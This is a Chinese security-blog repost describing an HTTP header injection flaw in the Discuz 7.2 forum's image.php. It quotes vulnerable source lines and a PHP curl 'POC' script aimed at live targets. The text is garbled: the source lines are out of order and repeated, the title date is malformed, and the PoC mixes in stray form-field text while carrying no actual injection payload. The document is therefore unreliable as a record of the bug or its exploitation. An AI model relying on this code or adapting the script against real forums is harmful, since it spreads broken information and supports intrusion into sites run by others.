dz7.2 HTTP 头注入漏洞 20107/7/

admin 2021年4月3日19:40:40评论30 views字数 783阅读2分36秒阅读模式

    dz7.2 HTTP 头注入漏洞 20107/7/,dz7.2 header injection vulnerability 20107/7/。 

image.php:

header  header('location: '.$boardurl.$thumbfile);
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("//+(api|archiver|wap)?/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

POC:

#!/usr/bin/php -f 

# image.php curl exploit 
# bincker/2010/7/7/ t00ls.net 
 
 
general settings: 
URL:   
COOKIEJAR:   
Max Exec Time:  (s)  
SSL:  BasicAuth:   
$_SERVER parameter:  
You can taint $_SERVER['PHP_SELF'] by editing the target URL.  
   
 
 
//  
// HTTP SERVER,   
//  
 
$target = $argv[1]; 
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php"); 
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); 
curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); 
$buf = curl_exec ($ch); 
curl_close($ch); 
unset($ch); 
 
echo $buf; 
 
?> 

文章来源于lcx.cc:dz7.2 HTTP 头注入漏洞 20107/7/

相关推荐: 雪晖在线投票系统 php 版上传漏洞

    雪晖在线投票系统 php 版上传漏洞,任意文件名解析漏洞。     上传文件 imgupload.php 文件代码: imgupload.php:

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:40:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dz7.2 HTTP 头注入漏洞 20107/7/http://cn-sec.com/archives/324331.html

发表评论

匿名网友 填写信息